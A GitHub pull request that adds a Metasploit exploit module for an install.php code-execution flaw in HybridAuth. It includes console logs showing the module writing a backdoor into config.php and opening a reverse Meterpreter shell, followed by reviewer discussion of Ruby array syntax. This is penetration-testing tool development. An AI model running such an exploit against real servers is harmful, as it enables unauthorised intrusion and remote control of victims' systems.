Add HybridAuth install.php PHP Code Execution module #3659

Merged
merged 2 commits into from Aug 19, 2014

Projects

None yet

4 participants

@bcoles
Contributor
bcoles commented Aug 16, 2014

Add HybridAuth install.php PHP Code Execution module

Tested on HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
Homepage: http://hybridauth.sourceforge.net/
Source: https://github.com/hybridauth/hybridauth

msf exploit(hybridauth_install_php_exec) > set VERBOSE true
msf exploit(hybridauth_install_php_exec) > set RHOST 192.168.1.1
msf exploit(hybridauth_install_php_exec) > set TARGETURI /hybridauth-2.2.2/hybridauth/
msf exploit(hybridauth_install_php_exec) > check
[*] 192.168.1.1:80 - Found version: 2.2.2
[+] 192.168.1.1:80 - The target is vulnerable.
msf exploit(hybridauth_install_php_exec) > run
[*] Started reverse handler on 192.168.1.136:4444
[*] 192.168.1.1:80 - Found version: 2.2.2
[*] 192.168.1.1:80 - Writing backdoor to config.php
[+] 192.168.1.1:80 - Wrote backdoor successfully
[*] 192.168.1.1:80 - Sending payload to config.php backdoor (1756 bytes)
[*] Sending stage (40551 bytes) to 192.168.1.1
[*] Meterpreter session 1 opened (192.168.1.136:4444 -> 192.168.1.1:55680) at 2014-08-16 18:01:38 -0400
[!] 192.168.1.1:80 - No response
[*] 192.168.1.1:80 - Removing backdoor from config.php
[+] 192.168.1.1:80 - Removed backdoor successfully

meterpreter > getuid
Server username: www-data (33)
@wchen-r7 wchen-r7 and 2 others commented on an outdated diff Aug 18, 2014
...s/exploits/unix/webapp/hybridauth_install_php_exec.rb
+ HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
+ is not removed after installation allowing unauthenticated users to
+ write PHP code to the application configuration file 'config.php'.
+
+ Note: This exploit will overwrite the application configuration file
+ rendering the application unusable.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Pichaya Morimoto', # Discovery and PoC
+ 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+ ],
+ 'References' =>
+ [
+ %w|EDB 34273 |,
@wchen-r7
wchen-r7 Aug 18, 2014 Contributor

That's something new, who recommended this format?

@bcoles
bcoles Aug 18, 2014 Contributor

It's a rubocop recommendation. I rolled with it because it's smaller, but in hindsight I should have used [] for consistency.

@kernelsmith
kernelsmith Aug 18, 2014 Contributor

I think the rubocop suggestion is fine, tho I’m not sure I agree with it, however the pipe ‘|’ is a very non-traditional choice for the delimiter, rubocop usually suggests a ‘(‘
so typically you’d see:

%w(EDB 34273),

most of the framework uses either [ ] or %w{ } but apparently the ‘{‘ is not in favor, so rubocopy usually suggests the ‘(‘. I think the pipe is bad choice unless you can’t use some of the more traditional chars due to content of the array. The pipe is used for way too many other operations in ruby, and I would not land this code as is.

I would use either %w(EDB 34273), or [‘EDB', ‘34273’]
2nd choice would be %w{EDB 34273},
Last choice, with justification, would be %w|EDB 34273|,

On Aug 18, 2014, at 1:16 PM, Brendan Coles notifications@github.com wrote:

In modules/exploits/unix/webapp/hybridauth_install_php_exec.rb:

  •    HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
    
  •    is not removed after installation allowing unauthenticated users to
    
  •    write PHP code to the application configuration file 'config.php'.
    
  •    Note: This exploit will overwrite the application configuration file
    
  •    rendering the application unusable.
    
  •  },
    
  •  'License'        => MSF_LICENSE,
    
  •  'Author'         =>
    
  •    [
    
  •      'Pichaya Morimoto', # Discovery and PoC
    
  •      'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
    
  •    ],
    
  •  'References'     =>
    
  •    [
    
  •      %w|EDB   34273 |,
    
    It's a rubocop recommendation. I rolled with it because it's smaller, but in hindsight I should have used [] for consistency.


Reply to this email directly or view it on GitHub.

@wchen-r7
wchen-r7 Aug 18, 2014 Contributor

rubocop is still currently experimental, we don't really have to agree with it. To be honest, I don't like everything rubobot suggests either.

@jvazquez-r7 jvazquez-r7 added the module label Aug 18, 2014
@wchen-r7 wchen-r7 self-assigned this Aug 19, 2014
@wchen-r7
Contributor
msf exploit(hybridauth_install_php_exec) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] 192.168.1.83:80 - Writing backdoor to config.php
[+] 192.168.1.83:80 - Wrote backdoor successfully
[*] 192.168.1.83:80 - Sending payload to config.php backdoor (1756 bytes)
[*] Sending stage (40551 bytes) to 192.168.1.83
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.83:51196) at 2014-08-19 17:17:45 -0500
[!] 192.168.1.83:80 - No response
[*] 192.168.1.83:80 - Removing backdoor from config.php
[+] 192.168.1.83:80 - Removed backdoor successfully

meterpreter >
@wchen-r7 wchen-r7 merged commit 564431f into rapid7:master Aug 19, 2014

1 check passed

continuous-integration/travis-ci The Travis CI build passed
Details
@wchen-r7 wchen-r7 added a commit that referenced this pull request Aug 19, 2014
@wchen-r7 wchen-r7 Land #3659 - Add HybridAuth install.php PHP Code Execution c73ec66
@bcoles bcoles deleted the bcoles:hybridauth_install_php_exec branch Aug 20, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment